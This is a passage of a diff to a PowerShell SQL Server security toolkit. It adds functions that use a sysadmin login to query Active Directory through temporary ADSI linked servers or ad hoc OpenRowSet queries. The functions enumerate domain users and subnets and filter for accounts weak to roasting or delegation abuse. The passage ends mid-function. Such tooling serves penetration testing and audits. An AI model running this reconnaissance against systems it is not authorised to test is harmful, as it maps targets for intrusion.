.PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Threads + Number of concurrent host threads. + .PARAMETER LdapPath + Ldap path. + .PARAMETER LdapFilter + LDAP filter. Example: -LdapFilter ";(&(objectCategory=Person)(objectClass=user))" + .PARAMETER LdapFields + Ldap fields. Example -LdapFields 'samaccountname,name,admincount,whencreated,whenchanged,adspath;' + .EXAMPLE + PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LdapFilter "(&(objectCategory=Person)(objectClass=user))" -LdapFields "samaccountname,name,admincount,whencreated,whenchanged,adspath" -LdapPath "domain.local" + .EXAMPLE + PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainObject -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Role name.')] - [string]$RolePrincipalName, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads. This is the number of instance to process at a time')] + [int]$Threads = 2, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL login or Windows account name.')] - [string]$PrincipalName, + HelpMessage = 'Ldap path. domain/dc=domain,dc=local')] + [string]$LdapPath, + + [Parameter(Mandatory = $false, + HelpMessage = 'Ldap filter. Example: (&(objectCategory=Person)(objectClass=user))')] + [string]$LdapFilter, + + [Parameter(Mandatory = $false, + HelpMessage = 'Ldap fields. Example: samaccountname,name,admincount,whencreated,whenchanged,adspath')] + [string]$LdapFields, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -6105,28 +7410,9 @@ Function Get-SQLServerRoleMember Begin { - # Table for output - $TblServerRoleMembers = New-Object -TypeName System.Data.DataTable - - # Setup role name filter - if ($RolePrincipalName) - { - $RoleOwnerFilter = " AND SUSER_NAME(role_principal_id) like '$RolePrincipalName'" - } - else - { - $RoleOwnerFilter = '' - } - - # Setup login name filter - if ($PrincipalName) - { - $PrincipalNameFilter = " AND SUSER_NAME(member_principal_id) like '$PrincipalName'" - } - else - { - $PrincipalNameFilter = '' - } + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblDomainObjects = New-Object -TypeName System.Data.DataTable } Process @@ -6160,337 +7446,513 @@ Function Get-SQLServerRoleMember return } - # Define Query - $Query = " SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance],role_principal_id as [RolePrincipalId], - SUSER_NAME(role_principal_id) as [RolePrincipalName], - member_principal_id as [PrincipalId], - SUSER_NAME(member_principal_id) as [PrincipalName] - FROM sys.server_role_members WHERE 1=1 - $PrincipalNameFilter - $RoleOwnerFilter" + # Check sysadmin + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $DomainName = $ServerInfo.DomainName + $IsSysadmin = $ServerInfo.IsSysadmin + $ServiceAccount = $ServerInfo.ServiceAccount + $SQLServerMajorVersion = $ServerInfo.SQLServerMajorVersion + $SQLServerEdition = $ServerInfo.SQLServerEdition + $SQLServerVersionNumber = $ServerInfo.SQLServerVersionNumber + $SQLCurrentLogin = $ServerInfo.Currentlogin + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$instance : Login: $SQLCurrentLogin" + Write-Verbose -Message "$Instance : Domain: $DomainName" + Write-Verbose -Message "$Instance : Version: SQL Server $SQLServerMajorVersion $SQLServerEdition ($SQLServerVersionNumber)" + } + + if($IsSysadmin -eq "No") + { + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Sysadmin: No" + Write-Verbose -Message "$Instance : This command requires sysadmin privileges. Exiting." + } + return + }else{ + + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Sysadmin: Yes" + } + } + + # When the following conditions are met stop, because it won't work + # sysadmin (implicit at this point in the code) + type sql login + no adhoc or provided link cred + if ($SQLCurrentLogin -notlike "*\*") + { + if(($UseAdHoc) -or ($LinkPassword)){ + # note + }else{ + Write-Verbose -Message "$Instance : A SQL Login with sysadmin privileges cannot execute ASDI queries through a linked server by itself." + Write-Verbose -Message "$Instance : Try one of the following:" + Write-Verbose -Message "$Instance : - Run the command again with the -UseAdHoc flag " + Write-Verbose -Message "$Instance : - Run the command again and provide -LinkUser and -LinkPassword" + return + } + } + + # Setup the LDAP Path + if(-not $LdapPath ){ + $LdapPath = $DomainName + } + + # Check if adsi is installed and can run in process + $CheckEnabled = Get-SQLOleDbProvder -Instance $Instance -Username $Username -Password $Password -SuppressVerbose | Where ProviderName -like "ADsDSOObject" | Select-Object AllowInProcess -ExpandProperty AllowInProcess + if ($CheckEnabled -ne 1){ + Write-Verbose -Message "$Instance : ADsDSOObject provider allowed to run in process: No" + Write-Verbose -Message "$Instance : The ADsDSOObject provider is not allowed to run in process. Stopping operation." + return + }else{ + Write-Verbose -Message "$Instance : ADsDSOObject provider allowed to run in process: Yes" + } + + # Determine query type + if($UseAdHoc){ + If (-not($SuppressVerbose)){ + + if ($SQLCurrentLogin -like "*\*"){ + Write-Verbose -Message "$Instance : Executing in AdHoc mode using OpenRowSet as '$SQLCurrentLogin'." + }else{ + if(-not $LinkUsername){ + Write-Verbose -Message "$Instance : Executing in AdHoc mode using OpenRowSet as the SQL Server service account ($ServiceAccount)." + }else{ + Write-Verbose -Message "$Instance : Executing in AdHoc mode using OpenRowSet as '$LinkUsername'." + } + } + } + }else{ + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Executing in Link mode using OpenQuery." + } + } + + # Create ADSI Link (if link) + if(-not $UseAdHoc){ + + # Create Random Name + $RandomLinkName = (-join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})) + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Creating ADSI SQL Server link named $RandomLinkName." + } + + # Create Link + $QueryCreateLink = " + + -- Create SQL Server link to ADSI + IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLinkName') = 0 + EXEC master.dbo.sp_addlinkedserver @server = N'$RandomLinkName', + @srvproduct=N'Active Directory Service Interfaces', + @provider=N'ADSDSOObject', + @datasrc=N'adsdatasource' + + ELSE + SELECT 'The target SQL Server link already exists.'" + + # Run query to create link + $QueryCreateLinkResults = Get-SQLQuery -Instance $Instance -Query $QueryCreateLink -Username $Username -Password $Password -Credential $Credential -ReturnError + + # Associate login with the link + if(($LinkUsername) -and ($LinkPassword)){ + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Associating login '$LinkUsername' with ADSI SQL Server link named $RandomLinkName." + } + + $QueryAssociateLogin = " + + EXEC sp_addlinkedsrvlogin + @rmtsrvname=N'$RandomLinkName', + @useself=N'False', + @locallogin=NULL, + @rmtuser=N'$LinkUsername', + @rmtpassword=N'$LinkPassword'" + + }else{ + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Associating '$SQLCurrentLogin' with ADSI SQL Server link named $RandomLinkName." + } + + $QueryAssociateLogin = " + -- Current User Context + -- Notes: testing tbd, sql login (non sysadmin), sql login (sysadmin), windows login (nonsysadmin), windows login (sysadmin), - test passthru and provided creds + EXEC sp_addlinkedsrvlogin + @rmtsrvname=N'$RandomLinkName', + @useself=N'True', + @locallogin=NULL, + @rmtuser=NULL, + @rmtpassword=NULL" + } + + # Run query to associate login with link + Get-SQLQuery -Instance $Instance -Query $QueryAssociateLogin -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + } + + # Enable AdHoc Queries (if adhoc and required) + if($UseAdHoc){ + + # Get current state + $Original_State_ShowAdv = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name like 'show advanced options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object value_in_use -ExpandProperty value_in_use + $Original_State_AdHocQuery = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name like 'Ad Hoc Distributed Queries'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object value_in_use -ExpandProperty value_in_use + + # Enable 'Show Advanced Options' + if($Original_State_ShowAdv -eq 0){ + + # Execute Query + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Enabling 'Show Advanced Options'" + } + }else{ + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : 'Show Advanced Options' is already enabled" + } + } + + # Enable 'Ad Hoc Distributed Queries' + if($Original_State_AdHocQuery -eq 0){ + + # Execute Query + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Enabling 'Ad Hoc Distributed Queries'" + } + }else{ + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : 'Ad Hoc Distributed Queries' are already enabled" + } + } + } + + # SetUp LDAP Query + if($UseAdHoc){ + + # Define adhoc query auth + if(($LinkUsername) -and ($LinkPassword)){ + $AdHocAuth = "User ID=$LinkUsername; Password=$LinkPassword;" + }else{ + $AdHocAuth = "adsdatasource" + } + + # Define adhoc query + $Query = " + -- Run with credential in syntax option 1 - works as sa + SELECT * + FROM OPENROWSET('ADSDSOOBJECT','$AdHocAuth', + ';$LdapFilter;$LdapFields;subtree')" + }else{ + + # Define link query + $Query = "SELECT * FROM OpenQuery($RandomLinkName,';$LdapFilter;$LdapFields;subtree')" + } + + # Display TSQL Query + # Write-verbose "Query: $Query" + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : LDAP query against logon server using ADSI OLEDB started..." + } # Execute Query - $TblServerRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential - # Append as needed - $TblServerRoleMembers = $TblServerRoleMembers + $TblServerRoleMembersTemp + # Add results to table + $TblDomainObjects += $TblResults + + # Remove ADSI Link (if Link) + if(-not $UseAdHoc){ + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Removing ADSI SQL Server link named $RandomLinkName" + } + + # Setup query to remove link + $RemoveLinkQuery = "EXEC master.dbo.sp_dropserver @server=N'$RandomLinkName', @droplogins='droplogins'" + + # Run query to remove link + $RemoveLinkQueryResults = Get-SQLQuery -Instance $Instance -Query $RemoveLinkQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore AdHoc State (if adhoc) + if($UseAdHoc){ + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : Restoring AdHoc settings if needed." + } + + # Restore ad hoc queries + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ad Hoc Distributed Queries',$Original_State_AdHocQuery;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Restore Show advanced options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',$Original_State_ShowAdv;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : LDAP query against logon server using ADSI OLEDB complete." + } } End { - # Return role members - $TblServerRoleMembers + # Return record count + $RecordCount = $TblDomainObjects.Row.count + + # Status user + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : $RecordCount records were found." + } + + # Return records + return $TblDomainObjects } } # ---------------------------------- -# Get-SQLDatabaseRole +# Get-SQLDomainUser # ---------------------------------- -# Author: Scott Sutherland -# Reference: https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx -Function Get-SQLDatabaseRole +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainUser { <# .SYNOPSIS - Returns database role information from target SQL Servers. + Using the OLE DB ADSI provider, query Active Directory for a list of domain users + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. The userstate parameter can also be used to filter users + by state such as disabled/locked, and property setting such as not requiring a password + or kerberos preauthentication. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER NoDefaults - Only select non default databases. - .PARAMETER RolePrincipalName - Role principalname to filter for. - .PARAMETER RoleOwner - Role owner's name to filter for. - + .PARAMETER TargetDomain + Domain to query. + .PARAMETER FilterUser + Domain user to filter for. + .PARAMETER UserState + Filter for users of specific state such as disabled, enabled, and locked. .EXAMPLE - PS C:\> Get-SQLDatabaseRole -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -RolePrincipalName DB_OWNER - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - RolePrincipalId : 16384 - RolePrincipalSid : 01050000000000090400000000000000000000000000000000400000 - RolePrincipalName : db_owner - RolePrincipalType : DATABASE_ROLE - OwnerPrincipalId : 1 - OwnerPrincipalName : sa - is_fixed_role : True - create_date : 4/8/2003 9:10:42 AM - modify_Date : 4/13/2009 12:59:14 PM - default_schema_name : + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + Only grab enabled users. .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseRole -Verbose + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState All + Only grab enabled users. + .EXAMPLE + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState Enabled + Only grab disabled users. + .EXAMPLE + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState Disabled + Only grab that don't require kerberos preauthentication. + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState PreAuthNotRequired + Only grab locked users. + .EXAMPLE + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState Locked + .EXAMPLE + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainUser -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server database name.')] - [string]$DatabaseName, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Role name.')] - [string]$RolePrincipalName, + HelpMessage = 'Filter users based on state or property settings.')] + [ValidateSet("All","Enabled","Disabled","Locked","PwNeverExpires","PwNotRequired","PreAuthNotRequired","SmartCardRequired","TrustedForDelegation","TrustedToAuthForDelegation","PwStoredRevEnc")] + [String]$UserState, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = "Role owner's name.")] - [string]$RoleOwner, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, - HelpMessage = 'Only select non default databases.')] - [switch]$NoDefaults, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain user to filter for.')] + [string]$FilterUser, [Parameter(Mandatory = $false, - HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Only list the users who have not changed their password in the number of days provided.')] + [Int]$PwLastSet, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { - # Setup table for output - $TblDatabaseRoles = New-Object -TypeName System.Data.DataTable - $null = $TblDatabaseRoles.Columns.Add('ComputerName') - $null = $TblDatabaseRoles.Columns.Add('Instance') - $null = $TblDatabaseRoles.Columns.Add('DatabaseName') - $null = $TblDatabaseRoles.Columns.Add('RolePrincipalId') - $null = $TblDatabaseRoles.Columns.Add('RolePrincipalSid') - $null = $TblDatabaseRoles.Columns.Add('RolePrincipalName') - $null = $TblDatabaseRoles.Columns.Add('RolePrincipalType') - $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalId') - $null = $TblDatabaseRoles.Columns.Add('OwnerPrincipalName') - $null = $TblDatabaseRoles.Columns.Add('is_fixed_role') - $null = $TblDatabaseRoles.Columns.Add('create_date') - $null = $TblDatabaseRoles.Columns.Add('modify_Date') - $null = $TblDatabaseRoles.Columns.Add('default_schema_name') - - # Setup RoleOwner filter - if ($RoleOwner) - { - $RoleOwnerFilter = " AND suser_name(owning_principal_id) like '$RoleOwner'" - } - else + # Set instance to local host by default + if(-not $Instance) { - $RoleOwnerFilter = '' + $Instance = $env:COMPUTERNAME } - # Setup RolePrincipalName filter - if ($RolePrincipalName) - { - $RolePrincipalNameFilter = " AND name like '$RolePrincipalName'" + # Setup user filter + if((-not $FilterUser)){ + $FilterUser = '*' } - else - { - $RolePrincipalNameFilter = '' - } - } - Process - { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + # Setup user state / property filter + if((-not $PwLastSet)){ + $PwLastSetFilter = "" + }else{ - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + # Get number of days from user and convert to timestamp + $DesiredTimeStamp = (Get-Date).AddDays(-$PwLastSet).ToFileTime() - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return + # Use timestamp to create filter to only list the users who have not changed their password in the number of days provided. + $PwLastSetFilter = "(!pwdLastSet>=$DesiredTimeStamp)" } - # Get list of databases - if($NoDefaults) - { - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults - } - else + # Setup user state filter + switch ($UserState) { - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + "All" {$UserStateFilter = ""} + "Enabled" {$UserStateFilter = "(!userAccountControl:1.2.840.113556.1.4.803:=2)"} + "Disabled" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=2)"} + "Locked" {$UserStateFilter = "(sAMAccountType=805306368)(lockoutTime>0)"} + "PwNeverExpires" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=65536)"} + "PwNotRequired" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"} + "PwStoredRevEnc" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=128)"} + "PreAuthNotRequired" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"} + "SmartCardRequired" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=262144)"} + "TrustedForDelegation" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"} + "TrustedToAuthForDelegation" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=16777216)"} } + } - # Get role for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName - - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Getting roles from the $DbName database." - } - - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$DbName' as [DatabaseName], - principal_id as [RolePrincipalId], - sid as [RolePrincipalSid], - name as [RolePrincipalName], - type_desc as [RolePrincipalType], - owning_principal_id as [OwnerPrincipalId], - suser_name(owning_principal_id) as [OwnerPrincipalName], - is_fixed_role, - create_date, - modify_Date, - default_schema_name - FROM [$DbName].[sys].[database_principals] - WHERE type like 'R' - $RolePrincipalNameFilter - $RoleOwnerFilter" - - # Execute Query - $TblDatabaseRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Update sid formatting for each entry and append results - $TblDatabaseRolesTemp | - ForEach-Object -Process { - # Format principal sid - $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','') - if ($NewSid.length -le 10) - { - $Sid = [Convert]::ToInt32($NewSid,16) - } - else - { - $Sid = $NewSid - } - - # Add results to table - $null = $TblDatabaseRoles.Rows.Add( - [string]$_.ComputerName, - [string]$_.Instance, - [string]$_.DatabaseName, - [string]$_.RolePrincipalId, - $Sid, - $_.RolePrincipalName, - [string]$_.RolePrincipalType, - [string]$_.OwnerPrincipalId, - [string]$_.OwnerPrincipalName, - [string]$_.is_fixed_role, - $_.create_date, - $_.modify_Date, - [string]$_.default_schema_name) - } + Process + { + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=Person)(objectClass=user)$PwLastSetFilter(SamAccountName=$FilterUser)$UserStateFilter)" -LdapFields "samaccountname,name,admincount,whencreated,whenchanged,adspath" -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=Person)(objectClass=user)$PwLastSetFilter(SamAccountName=$FilterUser)$UserStateFilter)" -LdapFields "samaccountname,name,admincount,whencreated,whenchanged,adspath" } } End - { - # Return data - $TblDatabaseRoles + { } } # ---------------------------------- -# Get-SQLDatabaseRoleMember +# Get-SQLDomainSubnet # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLDatabaseRoleMember +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainSubnet { <# .SYNOPSIS - Returns database role member information from target SQL Servers. + Using the OLE DB ADSI provider, query Active Directory for a list of domain subnets + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER RolePrincipalName - Role principalname to filter for. - .PARAMETER PrincipalName - Name of principal or Role to filter for. - + .PARAMETER TargetDomain + Domain to query. .EXAMPLE - PS C:\> Get-SQLDatabaseRoleMember -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - RolePrincipalId : 16387 - RolePrincipalName : db_ddladmin - PrincipalId : 5 - PrincipalName : evil - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - RolePrincipalId : 16391 - RolePrincipalName : db_datawriter - PrincipalId : 5 - PrincipalName : evil + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseRoleMember -Verbose + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainComputer -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -6502,23 +7964,13 @@ Function Get-SQLDatabaseRoleMember [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server database name.')] - [string]$DatabaseName, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Role name.')] - [string]$RolePrincipalName, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL login or Windows account name.')] - [string]$PrincipalName, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - HelpMessage = 'Only select non default databases.')] - [switch]$NoDefaults, + 